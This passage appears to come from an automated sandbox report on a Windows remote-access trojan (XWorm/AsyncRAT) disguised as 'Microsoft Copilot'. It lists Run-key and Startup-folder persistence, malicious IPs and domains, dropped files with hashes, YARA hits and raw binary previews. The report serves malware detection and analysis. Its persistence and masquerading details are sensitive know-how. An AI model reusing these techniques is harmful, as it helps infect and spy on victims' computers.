                                              02:35:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Copilot C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe
                                              02:35:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Copilot C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe
                                              02:35:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk
                                              18:53:12API Interceptor59x Sleep call for process: powershell.exe modified
                                              20:35:10API Interceptor181x Sleep call for process: Copilot.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.95.112.1H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                              • ip-api.com/json/?fields=225545
                                              A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                              • ip-api.com/line?fields=query,country
                                              BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                              • ip-api.com/line/?fields=hosting
                                              NewLoaderCracks_1.32.exeGet hashmaliciousDCRatBrowse
                                              • ip-api.com/line/?fields=hosting
                                              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                              • ip-api.com/json/?fields=225545
                                              SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                              • ip-api.com/json/?fields=225545
                                              147.185.221.21r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                                ra66DSpa.exeGet hashmaliciousXWormBrowse
                                                  Q5N7WOpk8J.batGet hashmaliciousUnknownBrowse
                                                    NzEsfIiAc0.exeGet hashmaliciousXWormBrowse
                                                      Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                        Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          WIN CHANGER 2.3.exeGet hashmaliciousXWormBrowse
                                                            jj7svxNeaQ.exeGet hashmaliciousXWormBrowse
                                                              PCCooker2.0_x64.exeGet hashmaliciousAsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRatBrowse
                                                                JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ip-api.comH2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                  • 208.95.112.1
                                                                  A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                  • 208.95.112.1
                                                                  BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  NewLoaderCracks_1.32.exeGet hashmaliciousDCRatBrowse
                                                                  • 208.95.112.1
                                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TUT-ASUSH2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                  • 208.95.112.1
                                                                  A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 208.95.112.1
                                                                  Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                  • 208.95.112.1
                                                                  BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                                  • 208.95.112.1
                                                                  NewLoaderCracks_1.32.exeGet hashmaliciousDCRatBrowse
                                                                  • 208.95.112.1
                                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  SolaraV3.exeGet hashmaliciousBlank GrabberBrowse
                                                                  • 208.95.112.1
                                                                  SALSGIVERUSH2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                  • 147.185.221.23
                                                                  A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 147.185.221.23
                                                                  Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  H1N45BQJ8x.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.23
                                                                  r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.21
                                                                  BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  ra66DSpa.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.21
                                                                  tMREqVW0.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.19
                                                                  wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dllPVUfopbGfc.exeGet hashmaliciousUnknownBrowse
                                                                    OqAVRCkQ3T.exeGet hashmaliciousUnknownBrowse
                                                                      PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                                                        OqAVRCkQ3T.exeGet hashmaliciousLummaCBrowse
                                                                          mapMd1URzq.exeGet hashmaliciousUnknownBrowse
                                                                            mnFHs2DuKg.exeGet hashmaliciousUnknownBrowse
                                                                              External.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                newvideozones.click.ps1Get hashmaliciousUnknownBrowse
                                                                                  use_2024_t#U043e_#U043epen.zipGet hashmaliciousUnknownBrowse

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Microsoft Copilot.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):654
                                                                                    Entropy (8bit):5.380476433908377
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................

                                                                                    C:\Users\user\AppData\Local\Temp\Copilot.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\PixpFUv4G7.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):71680
                                                                                    Entropy (8bit):6.095413522527565
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Q1V7h9TmCQFaZvmb5hcnl5xbdCPsPlyxCwtX5KG6lO14JWG:QLfTHMAtbdCPSeJKtO14wG
                                                                                    MD5:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    SHA1:4A5B7EA6C89DCD73D7C87EC7B3A7B3B266CCCD9B
                                                                                    SHA-256:D2F99E47B2E4C82BCC45E74FE83792F5C90E530B02A8B65837F256008F8A1C98
                                                                                    SHA-512:0FB243D4D9DAD3365E165500B8594B4208E1A9AB0CDF1DA778F6DFC43381357A8306C9EF2C34D8426D6E8EF48649918A2FBC81E2C5E5F2C573BF9F2CA8C9A5A7
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 84%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.g.............................-... ...@....@.. ....................................@.................................p-..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........c..........&.....................................................(....*.r...p*. C{..*..(....*.r...p*. 6V=.*.s.........s.........s.........s.........*.r+..p*. v...*.r...p*. S...*.rU..p*. ..n.*.r...p*. ....*.r...p*. ..d.*..((...*.r2..p*. . ..*.r...p*. `..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rl..p*. .'..*.r...p*. ...*.r!..p*. ..e.*.rA..p*. ~.H.*.ra..p*. ...*.r...p*. .h..*.r..

                                                                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):41
                                                                                    Entropy (8bit):3.7195394315431693
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                                    Malicious:false
                                                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                                    C:\Users\user\AppData\Local\Temp\Mech RAT.zip

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\PixpFUv4G7.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:modified
                                                                                    Size (bytes):6550613
                                                                                    Entropy (8bit):7.997617075553934
                                                                                    Encrypted:true
                                                                                    SSDEEP:196608:4MloB15b1lWrh91ptjKq1G+BxPzzotwNp89r+vy/:4DJRwrhPptjKq1rJS9iy/
                                                                                    MD5:75AD287A4A283544F660559B7627D329
                                                                                    SHA1:85B76B60FB76060A3BD441EA9C37369D357AB138
                                                                                    SHA-256:60F8C1236F86928CF5616A7B2FFF4B3ACFBECC39BF818EA8E03916ACA5012E56
                                                                                    SHA-512:71ED909A0F06BD2CC7015C7ED7FDA93C13C0BBFE00D9595A6CB79669D1F0B697BD4B6AF091B52B1412ED0352F73BC149AFCC117B55BD2251E92CB5907FC6C3EA
                                                                                    Malicious:false
                                                                                    Preview:PK........*eEY.............. .Mech RAT/UT...0l.g\l.g...fux.............PK........$eEY.............. .Mech RAT/aa-DJ/UT...%l.g\l.g%l.gux.............PK.........eEY............#. .Mech RAT/aa-DJ/Quasar.resources.dllUT....k.g+l.g%l.gux................\\M.'.@..........$..w...!8................7....v.ogo..e.N.9u._Jzq.......//.@.._.(......hd-h.z.Q.&(.QrMk.W.......=.......dj.rqw..8.$U4@......HT..P.....`...PV...................0...^.._.......7...K...o......{%}....?...#...._|.a.wR..P.....?.....i...mf7./7H.Z.\..B./,..]\]. ..{[.G.o...rV....v..B.....W..B'.?o.x._4.{....&......P...B6..........<i....y.4.].,..-\..].,\...nabn....w5st..1e.i[...8:.q2....A..vn...B...n.&v. UwS;.3..oMG[..!S....3.n6>.N.V^>..u1w.7.{...a..*..T....^.......Y......;.+.b...dc3.b5.0......q.7q..a!.?.ul...=]...].]...M.,.m\.4.\,L._u....?..U1.../.'l/.K........,:...3&.f.....8....O...v.....3......(R[....I.#..4.u]. g%...EB...R2A.-..7.)a ...4~=J.x..$...!/..ON!m-H.....P.......+.. .0.8...2..W..`..t....4!_G..@.....s.(A....

                                                                                    C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):71680
                                                                                    Entropy (8bit):6.095413522527565
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:Q1V7h9TmCQFaZvmb5hcnl5xbdCPsPlyxCwtX5KG6lO14JWG:QLfTHMAtbdCPSeJKtO14wG
                                                                                    MD5:34D9F35EA8D1A8C5A793D94B9FD998CB
                                                                                    SHA1:4A5B7EA6C89DCD73D7C87EC7B3A7B3B266CCCD9B
                                                                                    SHA-256:D2F99E47B2E4C82BCC45E74FE83792F5C90E530B02A8B65837F256008F8A1C98
                                                                                    SHA-512:0FB243D4D9DAD3365E165500B8594B4208E1A9AB0CDF1DA778F6DFC43381357A8306C9EF2C34D8426D6E8EF48649918A2FBC81E2C5E5F2C573BF9F2CA8C9A5A7
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: Joe Security
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 84%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.g.............................-... ...@....@.. ....................................@.................................p-..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........c..........&.....................................................(....*.r...p*. C{..*..(....*.r...p*. 6V=.*.s.........s.........s.........s.........*.r+..p*. v...*.r...p*. S...*.rU..p*. ..n.*.r...p*. ....*.r...p*. ..d.*..((...*.r2..p*. . ..*.r...p*. `..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rl..p*. .'..*.r...p*. ...*.r!..p*. ..e.*.rA..p*. ~.H.*.ra..p*. ...*.r...p*. .h..*.r..

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bcaxv5z.b0k.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zt03qhq.po0.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajczprla.cij.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzu5hxfh.xeq.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e243zlq3.bck.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egfsle4z.epq.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_klshm5t3.2ql.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgche4mn.wfz.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltbjgqci.0cf.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyhil3c3.lr2.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p012odqo.22x.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2fqu20u.f1v.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
